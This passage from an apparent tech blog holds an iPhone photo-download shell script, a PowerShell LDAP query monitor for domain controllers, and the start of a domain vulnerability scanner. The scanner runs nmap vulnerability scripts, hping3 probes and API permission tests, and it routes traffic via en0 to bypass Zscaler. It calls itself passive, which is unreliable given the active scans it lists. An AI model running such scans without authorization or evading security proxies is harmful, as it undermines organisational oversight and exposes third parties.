if [ -n "$START_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -lt "$START_TIMESTAMP" ]; then
SKIPPED_FILES=$((SKIPPED_FILES + 1))
continue
fi
if [ -n "$END_TIMESTAMP" ] && [ -n "$FILE_TIMESTAMP" ] && [ "$FILE_TIMESTAMP" -ge "$END_TIMESTAMP" ]; then
SKIPPED_FILES=$((SKIPPED_FILES + 1))
continue
fi
# Determine output path with YYYY/MMM structure
if [ "$ORGANIZE_BY_DATE" = true ]; then
YEAR=$(echo "$FILE_DATE" | cut -d'-' -f1)
MONTH_NUM=$(echo "$FILE_DATE" | cut -d'-' -f2)
# Convert month number to 3-letter abbreviation
case "$MONTH_NUM" in
01) MONTH="Jan" ;;
02) MONTH="Feb" ;;
03) MONTH="Mar" ;;
04) MONTH="Apr" ;;
05) MONTH="May" ;;
06) MONTH="Jun" ;;
07) MONTH="Jul" ;;
08) MONTH="Aug" ;;
09) MONTH="Sep" ;;
10) MONTH="Oct" ;;
11) MONTH="Nov" ;;
12) MONTH="Dec" ;;
*) MONTH="Unknown" ;;
esac
DEST_DIR="$OUTPUT_DIR/$YEAR/$MONTH"
else
DEST_DIR="$OUTPUT_DIR"
fi
else
DEST_DIR="$OUTPUT_DIR"
fi
# Create destination directory
mkdir -p "$DEST_DIR"
# Determine destination path
DEST_PATH="$DEST_DIR/$filename"
# Check if this file was previously completed successfully
if is_completed "$file" "$DEST_PATH"; then
echo "✓ Already downloaded: $filename"
SKIPPED_FILES=$((SKIPPED_FILES + 1))
continue
fi
# Check if file already exists with same content (for backward compatibility)
if [ -f "$DEST_PATH" ]; then
if cmp -s "$file" "$DEST_PATH"; then
echo "✓ Already exists (identical): $filename"
# Mark as completed for future runs
SOURCE_CHECKSUM=$(compute_checksum "$DEST_PATH")
mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
SKIPPED_FILES=$((SKIPPED_FILES + 1))
continue
else
# Add timestamp to avoid overwriting different file
BASE="${filename%.*}"
EXT="${filename##*.}"
DEST_PATH="$DEST_DIR/${BASE}_$(date +%s).$EXT"
fi
fi
# Use temporary file for atomic copy
TEMP_PATH="${DEST_PATH}.tmp.$$"
# Copy to temporary file
echo "⬇ Downloading: $filename → $DEST_PATH"
if ! cp "$file" "$TEMP_PATH" 2>/dev/null; then
echo "✗ Failed to copy: $filename"
rm -f "$TEMP_PATH"
FAILED_FILES=$((FAILED_FILES + 1))
continue
fi
# Verify size matches (basic corruption check)
SOURCE_SIZE=$(get_file_size "$file")
TEMP_SIZE=$(get_file_size "$TEMP_PATH")
if [ "$SOURCE_SIZE" != "$TEMP_SIZE" ]; then
echo "✗ Size mismatch for $filename (source: $SOURCE_SIZE, copied: $TEMP_SIZE)"
rm -f "$TEMP_PATH"
FAILED_FILES=$((FAILED_FILES + 1))
continue
fi
# Compute checksum for verification and tracking
if [ "$VERIFY_CHECKSUM" = true ]; then
SOURCE_CHECKSUM=$(compute_checksum "$TEMP_PATH")
else
SOURCE_CHECKSUM="skipped"
fi
# Preserve timestamps
if [ -n "$CREATE_DATE" ]; then
touch -t $(date -j -f "%Y-%m-%d %H:%M:%S" "$CREATE_DATE" "+%Y%m%d%H%M.%S" 2>/dev/null) "$TEMP_PATH" 2>/dev/null || true
fi
# Atomic move from temp to final destination
if mv "$TEMP_PATH" "$DEST_PATH" 2>/dev/null; then
echo "✓ Completed: $filename"
# Mark as successfully completed
mark_completed "$file" "$DEST_PATH" "$SOURCE_CHECKSUM"
COPIED_FILES=$((COPIED_FILES + 1))
else
echo "✗ Failed to finalize: $filename"
rm -f "$TEMP_PATH"
FAILED_FILES=$((FAILED_FILES + 1))
fi
done
echo ""
echo "=== Summary ==="
echo "Total files matching pattern: $TOTAL_FILES"
echo "Files downloaded: $COPIED_FILES"
echo "Files already present: $SKIPPED_FILES"
if [ $FAILED_FILES -gt 0 ]; then
echo "Files failed: $FAILED_FILES"
echo ""
echo "⚠ Some files failed to download. Run the script again to retry."
exit 1
fi
echo ""
echo "✓ Download complete! All files transferred successfully."
OUTER_EOF
echo "Making the script executable..."
chmod +x download-iphone-media.sh
echo "✓ Script created successfully: download-iphone-media.sh"

Usage Examples

Basic Usage

Download all photos and videos to the current directory:

./download-iphone-media.sh

Download with Date Organization

Organize files into folders by creation date (YYYY/MMM structure):

./download-iphone-media.sh -d -o ./Pictures

This creates a structure like:

./Pictures
├── 2024/
│   ├── Jan/
│   │   ├── IMG_1234.jpg
│   │   └── IMG_1235.heic
│   ├── Feb/
│   └── Dec/
├── 2025/
│   ├── Jan/
│   └── Nov/

Filter by File Pattern

Download only specific file types:

# Only JPG files
./download-iphone-media.sh -p "*.jpg" -o ~/Pictures/iPhone
# Only videos (MOV and MP4)
./download-iphone-media.sh -p "*.mov" -o ~/Videos/iPhone
./download-iphone-media.sh -p "*.mp4" -o ~/Videos/iPhone
# Files starting with IMG_
./download-iphone-media.sh -p "IMG_*" -o ~/Pictures
# HEIC photos (iPhone's default format)
./download-iphone-media.sh -p "*.heic" -o ~/Pictures/iPhone

Filter by Date Range

Download photos from a specific date range:

# Photos from January 2025
./download-iphone-media.sh -s 2025-01-01 -e 2025-01-31 -d -o ~/Pictures/January2025
# Photos from last week
./download-iphone-media.sh -s 2025-11-10 -e 2025-11-17 -o ~/Pictures/LastWeek
# Photos after a specific date
./download-iphone-media.sh -s 2025-11-01 -o ~/Pictures/Recent

Combined Filters

Combine multiple options for precise control:

# Download only videos from January 2025, organized by date
./download-iphone-media.sh -p "*.mov" -s 2025-01-01 -e 2025-01-31 -d -o ~/Videos/Vacation
# Download all HEIC photos from the last month, organized by date
./download-iphone-media.sh -p "*.heic" -s 2025-10-17 -e 2025-11-17 -d -o ~/Pictures/LastMonth

Features

Resumable & Idempotent Downloads

  • Crash recovery: Interrupted downloads can be resumed by running the script again
  • Atomic operations: Files are copied to temporary locations first, then moved atomically
  • State tracking: Maintains a hidden state directory (.iphone_download_state) to track completed files
  • Checksum verification: Uses SHA-256 checksums to verify file integrity (can be disabled with -n for speed)
  • No duplicates: Running the script multiple times won’t re-download existing files
  • Corruption detection: Validates file sizes and optionally checksums after copy

Date-Based Organization

  • Automatic folder structure: Creates YYYY/MMM folders based on photo creation date (e.g., 2025/Jan, 2025/Feb)
  • EXIF data support: Reads actual photo capture date from EXIF metadata when available
  • Fallback mechanism: Uses file modification time if EXIF data is unavailable
  • Fewer folders: Maximum 12 month folders per year instead of up to 365 day folders

Smart File Handling

  • Duplicate detection: Skips files that already exist with identical content
  • Conflict resolution: Adds timestamp suffix to filename if different file with same name exists
  • Timestamp preservation: Maintains original creation dates on copied files
  • Error tracking: Reports failed files and provides clear exit codes

Progress Feedback

  • Real-time progress updates showing each file being downloaded
  • Summary statistics at the end (total found, downloaded, skipped, failed)
  • Clear error messages for troubleshooting
  • Helpful resume instructions if interrupted

Common File Patterns

iPhone typically uses these file formats:

TypeExtensionsPattern Example
Photos.jpg.heic*.jpg or *.heic
Videos.mov.mp4*.mov or *.mp4
Screenshots.png*.png
Live Photos.heic.movIMG_*.heic + IMG_*.mov
All mediaall above* (default)

5. Handling Interrupted Downloads

If a download is interrupted (disconnection, error, etc.), simply run the script again:

# Script was interrupted - just run it again
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script will:

  • Skip all successfully downloaded files
  • Retry any failed files
  • Continue from where it left off

6. Fast Mode (Skip Checksum Verification)

For faster transfers on reliable connections, disable checksum verification:

# Skip checksums for speed (still verifies file sizes)
./download-iphone-media.sh -n -d -o ~/Pictures/iPhone

Note: This is generally safe but won’t detect corruption as thoroughly.

7. Clean State and Re-download

If you want to force a re-download of all files:

# Remove state directory to start fresh
rm -rf ~/Pictures/iPhone/.iphone_download_state
./download-iphone-media.sh -d -o ~/Pictures/iPhone

Troubleshooting

iPhone Not Detected

Error: No iPhone detected. Please connect your iPhone and trust this computer.

Solution:

  1. Make sure your iPhone is connected via USB cable
  2. Unlock your iPhone
  3. Tap “Trust” when prompted on your iPhone
  4. Run idevicepair pair if you haven’t already

Failed to Mount iPhone

Error: Failed to mount iPhone

Solution:

  1. Try unplugging and reconnecting your iPhone
  2. Check if another process is using the iPhone:umount /tmp/iphone_mount 2>/dev/null
  3. Restart your iPhone and try again
  4. On macOS Ventura or later, check System Settings → Privacy & Security → Files and Folders

Permission Denied

Solution:
Make sure the script has executable permissions:

chmod +x download-iphone-media.sh

Missing Tools

Error: Commands not found

Solution:
Install the required tools:

brew install libimobiledevice ifuse exiftool

On newer macOS versions, you may need to install macFUSE:

brew install --cask macfuse

After installation, you may need to restart your Mac and allow the kernel extension in System Settings → Privacy & Security.

Tips and Best Practices

1. Regular Backups

Create a scheduled backup script:

#!/bin/bash
# Save as ~/bin/backup-iphone-photos.sh
DATE=$(date +%Y-%m-%d)
BACKUP_DIR=~/Pictures/iPhone-Backups/$DATE
./download-iphone-media.sh -d -o "$BACKUP_DIR"
echo "Backup completed to $BACKUP_DIR"

2. Incremental Downloads

The script is fully idempotent and tracks completed downloads, making it perfect for incremental backups:

# Run daily to get new photos - only new files will be downloaded
./download-iphone-media.sh -d -o ~/Pictures/iPhone

The script maintains state in .iphone_download_state/ within your output directory, ensuring:

  • Already downloaded files are skipped instantly (no re-copying)
  • Interrupted downloads can be resumed
  • File integrity is verified with checksums

3. Free Up iPhone Storage

After confirming successful download:

  1. Verify files are on your MacBook
  2. Check file counts match
  3. Delete photos from iPhone via Photos app
  4. Empty “Recently Deleted” album

4. Convert HEIC to JPG (Optional)

If you need JPG files for compatibility:

# Install ImageMagick
brew install imagemagick
# Convert all HEIC files to JPG
find ~/Pictures/iPhone -name "*.heic" -exec sh -c 'magick "$0" "${0%.heic}.jpg"' {} \;

How Idempotent Recovery Works

The script implements several mechanisms to ensure safe, resumable downloads:

1. State Tracking

A hidden directory .iphone_download_state/ is created in your output directory. For each successfully downloaded file, a state file is created containing:

  • Destination file path
  • SHA-256 checksum (if verification enabled)
  • Completion timestamp

2. Atomic Operations

Each file is downloaded using a two-phase commit:

  1. Download Phase: Copy to temporary file (.tmp.$$ suffix)
  2. Verification Phase: Check file size and optionally compute checksum
  3. Commit Phase: Atomically move temp file to final destination
  4. Record Phase: Write completion state

If the script is interrupted at any point, incomplete temporary files are cleaned up automatically.

3. Idempotent Behavior

When you run the script:

  1. Before downloading each file, it checks the state directory
  2. If a state file exists, it verifies the destination file still exists and matches the checksum
  3. If verification passes, the file is skipped (no re-download)
  4. If verification fails or no state exists, the file is downloaded

This means:

  • ✓ Safe to run multiple times
  • ✓ Interrupted downloads can be resumed
  • ✓ Corrupted files are detected and re-downloaded
  • ✓ No wasted bandwidth on already-downloaded files

4. Checksum Verification

By default, SHA-256 checksums are computed and verified:

  • During download: Checksum computed after copy completes
  • On resume: Existing files are verified against stored checksum
  • Optional: Use -n flag to skip checksums for speed (still verifies file sizes)

Example Recovery Scenario

# Start downloading 1000 photos
./download-iphone-media.sh -d -o ~/Pictures/iPhone
# Script is interrupted after 500 files
# Press Ctrl+C or cable disconnects
# Simply run again - picks up where it left off
./download-iphone-media.sh -d -o ~/Pictures/iPhone
# Output:
# ✓ Already downloaded: IMG_0001.heic
# ✓ Already downloaded: IMG_0002.heic
# ...
# ⬇ Downloading: IMG_0501.heic → ~/Pictures/iPhone/2025/Jan/IMG_0501.heic

Performance Notes

  • Transfer speed: Depends on USB connection (USB 2.0 vs USB 3.0)
  • Large libraries: May take significant time for thousands of photos
  • EXIF reading: Adds minimal overhead but provides accurate dates
  • Pattern matching: Processed client-side, so all files are scanned

Conclusion

This script provides a robust, production-ready solution for downloading photos and videos from your iPhone to your MacBook. Key capabilities:

Core Features:

  • Filter by file patterns (type, name)
  • Filter by date ranges
  • Organize automatically into date-based folders
  • Preserve original file metadata

Reliability:

  • Fully idempotent – safe to run multiple times
  • Resumable downloads with automatic crash recovery
  • Atomic file operations prevent corruption
  • Checksum verification ensures data integrity
  • Clear error reporting and recovery instructions

For regular use, consider creating aliases in your ~/.zshrc:

# Add to ~/.zshrc
alias iphone-backup='~/download-iphone-media.sh -d -o ~/Pictures/iPhone'
alias iphone-videos='~/download-iphone-media.sh -p "*.mov" -d -o ~/Videos/iPhone'

Then simply run iphone-backup whenever you want to download your photos!

Resources

Windows Domain Controller: Monitor and Log LDAP operations/queries use of resources

The script below monitors LDAP operations on a Domain Controller and logs detailed information about queries that exceed specified thresholds for execution time, CPU usage, or results returned. It helps identify problematic LDAP queries that may be impacting domain controller performance.

Parameter: ThresholdSeconds
Minimum query duration in seconds to log (default: 5)

Parameter: LogPath
Path where log files will be saved (default: C:\LDAPDiagnostics)

Parameter: MonitorDuration
How long to monitor in minutes (default: continuous)

EXAMPLE
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -LogPath “C:\Logs\LDAP”

[CmdletBinding()]
param(
[int]$ThresholdSeconds = 5,
[string]$LogPath = "C:\LDAPDiagnostics",
[int]$MonitorDuration = 0  # 0 = continuous
)
# Requires Administrator privileges
#Requires -RunAsAdministrator
# Create log directory if it doesn't exist
if (-not (Test-Path $LogPath)) {
New-Item -ItemType Directory -Path $LogPath -Force | Out-Null
}
$logFile = Join-Path $LogPath "LDAP_Diagnostics_$(Get-Date -Format 'yyyyMMdd_HHmmss').log"
$csvFile = Join-Path $LogPath "LDAP_Queries_$(Get-Date -Format 'yyyyMMdd_HHmmss').csv"
function Write-Log {
param([string]$Message, [string]$Level = "INFO")
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
$logMessage = "[$timestamp] [$Level] $Message"
Write-Host $logMessage
Add-Content -Path $logFile -Value $logMessage
}
function Get-LDAPStatistics {
try {
# Query NTDS performance counters for LDAP statistics
$ldapStats = @{
ActiveThreads = (Get-Counter '\NTDS\LDAP Active Threads' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
SearchesPerSec = (Get-Counter '\NTDS\LDAP Searches/sec' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
ClientSessions = (Get-Counter '\NTDS\LDAP Client Sessions' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
BindTime = (Get-Counter '\NTDS\LDAP Bind Time' -ErrorAction SilentlyContinue).CounterSamples.CookedValue
}
return $ldapStats
}
catch {
Write-Log "Error getting LDAP statistics: $_" "ERROR"
return $null
}
}
function Parse-LDAPEvent {
param($Event)
$eventData = @{
TimeCreated = $Event.TimeCreated
ClientIP = $null
ClientPort = $null
StartingNode = $null
Filter = $null
SearchScope = $null
AttributeSelection = $null
ServerControls = $null
VisitedEntries = $null
ReturnedEntries = $null
TimeInServer = $null
}
# Parse event XML for detailed information
try {
$xml = [xml]$Event.ToXml()
$dataNodes = $xml.Event.EventData.Data
foreach ($node in $dataNodes) {
switch ($node.Name) {
"Client" { $eventData.ClientIP = ($node.'#text' -split ':')[0] }
"StartingNode" { $eventData.StartingNode = $node.'#text' }
"Filter" { $eventData.Filter = $node.'#text' }
"SearchScope" { $eventData.SearchScope = $node.'#text' }
"AttributeSelection" { $eventData.AttributeSelection = $node.'#text' }
"ServerControls" { $eventData.ServerControls = $node.'#text' }
"VisitedEntries" { $eventData.VisitedEntries = $node.'#text' }
"ReturnedEntries" { $eventData.ReturnedEntries = $node.'#text' }
"TimeInServer" { $eventData.TimeInServer = $node.'#text' }
}
}
}
catch {
Write-Log "Error parsing event XML: $_" "WARNING"
}
return $eventData
}
Write-Log "=== LDAP Query Diagnostics Started ===" "INFO"
Write-Log "Threshold: $ThresholdSeconds seconds" "INFO"
Write-Log "Log Path: $LogPath" "INFO"
Write-Log "Monitor Duration: $(if($MonitorDuration -eq 0){'Continuous'}else{$MonitorDuration + ' minutes'})" "INFO"
# Enable Field Engineering logging if not already enabled
Write-Log "Checking Field Engineering diagnostic logging settings..." "INFO"
try {
$regPath = "HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Diagnostics"
$currentValue = Get-ItemProperty -Path $regPath -Name "15 Field Engineering" -ErrorAction SilentlyContinue
if ($currentValue.'15 Field Engineering' -lt 5) {
Write-Log "Enabling Field Engineering logging (level 5)..." "INFO"
Set-ItemProperty -Path $regPath -Name "15 Field Engineering" -Value 5
Write-Log "Field Engineering logging enabled. You may need to restart NTDS service for full effect." "WARNING"
}
else {
Write-Log "Field Engineering logging already enabled at level $($currentValue.'15 Field Engineering')" "INFO"
}
}
catch {
Write-Log "Error configuring diagnostic logging: $_" "ERROR"
}
# Create CSV header
$csvHeader = "TimeCreated,ClientIP,StartingNode,Filter,SearchScope,AttributeSelection,VisitedEntries,ReturnedEntries,TimeInServer,ServerControls"
Set-Content -Path $csvFile -Value $csvHeader
Write-Log "Monitoring for expensive LDAP queries (threshold: $ThresholdSeconds seconds)..." "INFO"
Write-Log "Press Ctrl+C to stop monitoring" "INFO"
$startTime = Get-Date
$queriesLogged = 0
try {
while ($true) {
# Check if monitoring duration exceeded
if ($MonitorDuration -gt 0) {
$elapsed = (Get-Date) - $startTime
if ($elapsed.TotalMinutes -ge $MonitorDuration) {
Write-Log "Monitoring duration reached. Stopping." "INFO"
break
}
}
# Get current LDAP statistics
$stats = Get-LDAPStatistics
if ($stats) {
Write-Verbose "Active Threads: $($stats.ActiveThreads), Searches/sec: $($stats.SearchesPerSec), Client Sessions: $($stats.ClientSessions)"
}
# Query Directory Service event log for expensive LDAP queries
# Event ID 1644 = expensive search operations
$events = Get-WinEvent -FilterHashtable @{
LogName = 'Directory Service'
Id = 1644
StartTime = (Get-Date).AddSeconds(-10)
} -ErrorAction SilentlyContinue
foreach ($event in $events) {
$eventData = Parse-LDAPEvent -Event $event
# Convert time in server from milliseconds to seconds
$timeInSeconds = if ($eventData.TimeInServer) { 
[int]$eventData.TimeInServer / 1000 
} else { 
0 
}
if ($timeInSeconds -ge $ThresholdSeconds) {
$queriesLogged++
Write-Log "=== Expensive LDAP Query Detected ===" "WARNING"
Write-Log "Time: $($eventData.TimeCreated)" "WARNING"
Write-Log "Client IP: $($eventData.ClientIP)" "WARNING"
Write-Log "Duration: $timeInSeconds seconds" "WARNING"
Write-Log "Starting Node: $($eventData.StartingNode)" "WARNING"
Write-Log "Filter: $($eventData.Filter)" "WARNING"
Write-Log "Search Scope: $($eventData.SearchScope)" "WARNING"
Write-Log "Visited Entries: $($eventData.VisitedEntries)" "WARNING"
Write-Log "Returned Entries: $($eventData.ReturnedEntries)" "WARNING"
Write-Log "Attributes: $($eventData.AttributeSelection)" "WARNING"
Write-Log "Server Controls: $($eventData.ServerControls)" "WARNING"
Write-Log "======================================" "WARNING"
# Write to CSV
$csvLine = "$($eventData.TimeCreated),$($eventData.ClientIP),$($eventData.StartingNode),`"$($eventData.Filter)`",$($eventData.SearchScope),`"$($eventData.AttributeSelection)`",$($eventData.VisitedEntries),$($eventData.ReturnedEntries),$($eventData.TimeInServer),`"$($eventData.ServerControls)`""
Add-Content -Path $csvFile -Value $csvLine
}
}
Start-Sleep -Seconds 5
}
}
catch {
Write-Log "Error during monitoring: $_" "ERROR"
}
finally {
Write-Log "=== LDAP Query Diagnostics Stopped ===" "INFO"
Write-Log "Total expensive queries logged: $queriesLogged" "INFO"
Write-Log "Log file: $logFile" "INFO"
Write-Log "CSV file: $csvFile" "INFO"
}
```
## Usage Examples
### Basic Usage (Continuous Monitoring)
Run with default settings - monitors queries taking 5+ seconds:
```powershell
.\Diagnose-LDAPQueries.ps1
```
### Custom Threshold and Duration
Monitor for 30 minutes, logging queries that take 3+ seconds:
```powershell
.\Diagnose-LDAPQueries.ps1 -ThresholdSeconds 3 -MonitorDuration 30
```
### Custom Log Location
Save logs to a specific directory:
```powershell
.\Diagnose-LDAPQueries.ps1 -LogPath "D:\Logs\LDAP"
```
### Verbose Output
See real-time LDAP statistics while monitoring:
```powershell
.\Diagnose-LDAPQueries.ps1 -Verbose
```
## Requirements
- **Administrator privileges** on the domain controller
- **Windows Server** with Active Directory Domain Services role
- **PowerShell 5.1 or later**
## Understanding the Output
### Log File Example
```
[2025-01-15 14:23:45] [WARNING] === Expensive LDAP Query Detected ===
[2025-01-15 14:23:45] [WARNING] Time: 01/15/2025 14:23:43
[2025-01-15 14:23:45] [WARNING] Client IP: 192.168.1.50
[2025-01-15 14:23:45] [WARNING] Duration: 8.5 seconds
[2025-01-15 14:23:45] [WARNING] Starting Node: DC=contoso,DC=com
[2025-01-15 14:23:45] [WARNING] Filter: (&(objectClass=user)(memberOf=*))
[2025-01-15 14:23:45] [WARNING] Search Scope: 2
[2025-01-15 14:23:45] [WARNING] Visited Entries: 45000
[2025-01-15 14:23:45] [WARNING] Returned Entries: 12000
```
### What to Look For
- **High visited/returned ratio** - Indicates an inefficient filter
- **Subtree searches from root** - Often unnecessarily broad
- **Wildcard filters** - Like `(cn=*)` can be very expensive
- **Unindexed attributes** - Queries on non-indexed attributes visit many entries
- **Repeated queries** - Same client making the same expensive query repeatedly
## Troubleshooting Common Issues
### No Events Appearing
If you're not seeing Event ID 1644, you may need to lower the expensive search threshold in Active Directory:
```powershell
# Lower the threshold to 1000ms (1 second)
Get-ADObject "CN=Query-Policies,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=yourdomain,DC=com" | 
Set-ADObject -Replace @{lDAPAdminLimits="MaxQueryDuration=1000"}
```
### Script Requires Restart
After enabling Field Engineering logging, you may need to restart the NTDS service:
```powershell
Restart-Service NTDS -Force
```

Best Practices

1. **Run during peak hours** to capture real-world problematic queries
2. **Start with a lower threshold** (2-3 seconds) to catch more queries
3. **Analyze the CSV** in Excel or Power BI for patterns
4. **Correlate with client IPs** to identify problematic applications
5. **Work with application owners** to optimize queries with indexes or better filters

Once you’ve identified expensive queries:

1. **Add indexes** for frequently searched attributes
2. **Optimize LDAP filters** to be more specific
3. **Reduce search scope** where possible
4. **Implement paging** for large result sets
5. **Cache results** on the client side when appropriate

This script has helped me identify numerous performance bottlenecks in production environments. I hope it helps you optimize your Active Directory infrastructure as well!

Macbook: Enhanced Domain Vulnerability Scanner

Below is a fairly comprehensive passive penetration testing script with vulnerability scanning, API testing, and detailed reporting.

Features

  • DNS & SSL/TLS Analysis – Complete DNS enumeration, certificate inspection, cipher analysis
  • Port & Vulnerability Scanning – Service detection, NMAP vuln scripts, outdated software detection
  • Subdomain Discovery – Certificate transparency log mining
  • API Security Testing – Endpoint discovery, permission testing, CORS analysis
  • Asset Discovery – Web technology detection, CMS identification
  • Firewall Testing – hping3 TCP/ICMP tests (if available)
  • Network Bypass – Uses en0 interface to bypass Zscaler
  • Debug Mode – Comprehensive logging enabled by default

Installation

Required Dependencies

# macOS
brew install nmap openssl bind curl jq
# Linux
sudo apt-get install nmap openssl dnsutils curl jq

Optional Dependencies

# macOS
brew install hping
# Linux
sudo apt-get install hping3 nikto

Usage

Basic Syntax

./security_scanner_enhanced.sh -d DOMAIN [OPTIONS]

Options

  • -d DOMAIN – Target domain (required)
  • -s – Enable subdomain scanning
  • -m NUM – Max subdomains to scan (default: 10)
  • -v – Enable vulnerability scanning
  • -a – Enable API discovery and testing
  • -h – Show help

Examples:

# Basic scan
./security_scanner_enhanced.sh -d example.com
# Full scan with all features
./security_scanner_enhanced.sh -d example.com -s -m 20 -v -a
# Vulnerability assessment only
./security_scanner_enhanced.sh -d example.com -v
# API security testing
./security_scanner_enhanced.sh -d example.com -a

Network Configuration

Default Interface: en0 (bypasses Zscaler)

To change the interface, edit line 24:

NETWORK_INTERFACE="en0"  # Change to your interface

The script automatically falls back to default routing if the interface is unavailable.

Debug Mode

Debug mode is enabled by default and shows:

  • Dependency checks
  • Network interface status
  • Command execution details
  • Scan progress
  • File operations

Debug messages appear in cyan with [DEBUG] prefix.

To disable, edit line 27:

DEBUG=false

Output

Each scan creates a timestamped directory: scan_example.com_20251016_191806/

Key Files

  • executive_summary.md – High-level findings
  • technical_report.md – Detailed technical analysis
  • vulnerability_report.md – Vulnerability assessment (if -v used)
  • api_security_report.md – API security findings (if -a used)
  • dns_*.txt – DNS records
  • ssl_*.txt – SSL/TLS analysis
  • port_scan_*.txt – Port scan results
  • subdomains_discovered.txt – Found subdomains (if -s used)

Scan Duration

Scan TypeDuration
Basic2-5 min
With subdomains+1-2 min/subdomain
With vulnerabilities+10-20 min
Full scan15-30 min

Troubleshooting

Missing dependencies

# Install required tools
brew install nmap openssl bind curl jq  # macOS
sudo apt-get install nmap openssl dnsutils curl jq  # Linux

Interface not found

# Check available interfaces
ifconfig
# Script will automatically fall back to default routing

Permission errors

# Some scans may require elevated privileges
sudo ./security_scanner_enhanced.sh -d example.com

Configuration

Change scan ports (line 325)

# Default: top 1000 ports
--top-ports 1000
# Custom ports
-p 80,443,8080,8443
# All ports (slow)
-p-

Adjust subdomain limit (line 1162)

MAX_SUBDOMAINS=10  # Change as needed

Add custom API paths (line 567)

API_PATHS=(
"/api"
"/api/v1"
"/custom/endpoint"  # Add yours
)

⚠️ WARNING: Only scan domains you own or have explicit permission to test. Unauthorized scanning may be illegal.

This tool performs passive reconnaissance only:

  • ✅ DNS queries, certificate logs, public web requests
  • ❌ No exploitation, brute force, or denial of service

Best Practices

  1. Obtain proper authorization before scanning
  2. Monitor progress via debug output
  3. Review all generated reports
  4. Prioritize findings by risk
  5. Schedule follow-up scans after remediation

Disclaimer: This tool is for authorized security testing only. The authors assume no liability for misuse or damage.

The Script:

cat > ./security_scanner_enhanced.sh << 'EOF'
#!/bin/zsh
################################################################################
# Enhanced Security Scanner Script v2.0
# Comprehensive security assessment with vulnerability scanning
# Includes: NMAP vuln scripts, hping3, asset discovery, API testing
# Network Interface: en0 (bypasses Zscaler)
# Debug Mode: Enabled
################################################################################
# Color codes for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
MAGENTA='\033[0;35m'
CYAN='\033[0;36m'
NC='\033[0m' # No Color
# Script version
VERSION="2.0.1"
# Network interface to use (bypasses Zscaler)
NETWORK_INTERFACE="en0"
# Debug mode flag
DEBUG=true
################################################################################
# Usage Information
################################################################################
usage() {
cat << EOF
Enhanced Security Scanner v${VERSION}
Usage: $0 -d DOMAIN [-s] [-m MAX_SUBDOMAINS] [-v] [-a]
Options:
-d DOMAIN           Target domain to scan (required)
-s                  Scan subdomains (optional)
-m MAX_SUBDOMAINS   Maximum number of subdomains to scan (default: 10)
-v                  Enable vulnerability scanning (NMAP vuln scripts)
-a                  Enable API discovery and testing
-h                  Show this help message
Network Configuration:
Interface: $NETWORK_INTERFACE (bypasses Zscaler)
Debug Mode: Enabled
Examples:
$0 -d example.com
$0 -d example.com -s -m 20 -v
$0 -d example.com -s -v -a
EOF
exit 1
}
################################################################################
# Logging Functions
################################################################################
log_info() {
echo -e "${BLUE}[INFO]${NC} $1"
}
log_success() {
echo -e "${GREEN}[SUCCESS]${NC} $1"
}
log_warning() {
echo -e "${YELLOW}[WARNING]${NC} $1"
}
log_error() {
echo -e "${RED}[ERROR]${NC} $1"
}
log_vuln() {
echo -e "${MAGENTA}[VULN]${NC} $1"
}
log_debug() {
if [ "$DEBUG" = true ]; then
echo -e "${CYAN}[DEBUG]${NC} $1"
fi
}
################################################################################
# Check Dependencies
################################################################################
check_dependencies() {
log_info "Checking dependencies..."
log_debug "Starting dependency check"
local missing_deps=()
local optional_deps=()
# Required dependencies
log_debug "Checking for nmap..."
command -v nmap >/dev/null 2>&1 || missing_deps+=("nmap")
log_debug "Checking for openssl..."
command -v openssl >/dev/null 2>&1 || missing_deps+=("openssl")
log_debug "Checking for dig..."
command -v dig >/dev/null 2>&1 || missing_deps+=("dig")
log_debug "Checking for curl..."
command -v curl >/dev/null 2>&1 || missing_deps+=("curl")
log_debug "Checking for jq..."
command -v jq >/dev/null 2>&1 || missing_deps+=("jq")
# Optional dependencies
log_debug "Checking for hping3..."
command -v hping3 >/dev/null 2>&1 || optional_deps+=("hping3")
log_debug "Checking for nikto..."
command -v nikto >/dev/null 2>&1 || optional_deps+=("nikto")
if [ ${#missing_deps[@]} -ne 0 ]; then
log_error "Missing required dependencies: ${missing_deps[*]}"
log_info "Install missing dependencies and try again"
exit 1
fi
if [ ${#optional_deps[@]} -ne 0 ]; then
log_warning "Missing optional dependencies: ${optional_deps[*]}"
log_info "Some features may be limited"
fi
# Check network interface
log_debug "Checking network interface: $NETWORK_INTERFACE"
if ifconfig "$NETWORK_INTERFACE" >/dev/null 2>&1; then
log_success "Network interface $NETWORK_INTERFACE is available"
local interface_ip=$(ifconfig "$NETWORK_INTERFACE" | grep 'inet ' | awk '{print $2}')
log_debug "Interface IP: $interface_ip"
else
log_warning "Network interface $NETWORK_INTERFACE not found, using default routing"
NETWORK_INTERFACE=""
fi
log_success "All required dependencies found"
}
################################################################################
# Initialize Scan
################################################################################
initialize_scan() {
log_debug "Initializing scan for domain: $DOMAIN"
SCAN_DATE=$(date +"%Y-%m-%d %H:%M:%S")
SCAN_DIR="scan_${DOMAIN}_$(date +%Y%m%d_%H%M%S)"
log_debug "Creating scan directory: $SCAN_DIR"
mkdir -p "$SCAN_DIR"
cd "$SCAN_DIR" || exit 1
log_success "Created scan directory: $SCAN_DIR"
log_debug "Current working directory: $(pwd)"
# Initialize report files
EXEC_REPORT="executive_summary.md"
TECH_REPORT="technical_report.md"
VULN_REPORT="vulnerability_report.md"
API_REPORT="api_security_report.md"
log_debug "Initializing report files"
> "$EXEC_REPORT"
> "$TECH_REPORT"
> "$VULN_REPORT"
> "$API_REPORT"
log_debug "Scan configuration:"
log_debug "  - Domain: $DOMAIN"
log_debug "  - Subdomain scanning: $SCAN_SUBDOMAINS"
log_debug "  - Max subdomains: $MAX_SUBDOMAINS"
log_debug "  - Vulnerability scanning: $VULN_SCAN"
log_debug "  - API scanning: $API_SCAN"
log_debug "  - Network interface: $NETWORK_INTERFACE"
}
